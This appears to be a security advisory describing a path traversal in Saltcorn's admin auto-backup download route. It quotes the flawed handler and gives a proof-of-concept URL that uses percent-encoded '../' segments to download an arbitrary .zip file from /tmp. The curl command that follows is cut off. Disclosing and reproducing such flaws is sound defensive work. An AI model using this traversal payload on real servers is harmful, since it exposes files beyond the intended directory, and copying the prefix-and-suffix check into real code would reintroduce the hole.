### Summary

A user with admin permission can read and download arbitrary zip files when downloading auto backups. The file name used to identify the zip file is not properly sanitized before it is passed to the `res.download` API.

### Details

file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/admin.js#L671-L682

```js
router.get(
  "/auto-backup-download/:filename",
  isAdmin,
  error_catcher(async (req, res) => {
    const { filename } = req.params; // [1] source
    […]
    if (
      !isRoot ||
      !(filename.startsWith(backup_file_prefix) && filename.endsWith(".zip")) // [2]
    ) {
      res.redirect("/admin/backup");
      return;
    }
    const auto_backup_directory = getState().getConfig("auto_backup_directory");
    res.download(path.join(auto_backup_directory, filename), filename); // [3] sink
  })
);
```

The check at [2] only verifies the prefix and the `.zip` suffix of the name. Express percent-decodes route parameters before the handler runs, so `%2f` in the URL arrives as `/` in `filename`; a value such as `sc-backup-/../../tmp/secret.zip` satisfies both string checks, and `path.join` at [3] then normalizes the `..` components, letting the resulting path escape `auto_backup_directory`.

### Steps to reproduce (PoC)

1. Create a file with a `.zip` extension under the `/tmp` folder:

```bash
echo "secret12345" > /tmp/secret.zip
```

2. Log into the application as an admin user.

3. Visit the URL:

```
https://localhost:3000/admin/auto-backup-download/sc-backup-%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fsecret.zip
```

4. Download the zip file and then check that the file from `/tmp` was indeed downloaded:

```bash
cat secret.zip
secret12345
```

Alternatively, send the following request to retrieve the file just created (the command is truncated in the source):

```bash
curl -i -X $'GET' -H $'Host: localhost:3000' -H $'Connection: close' -b…
```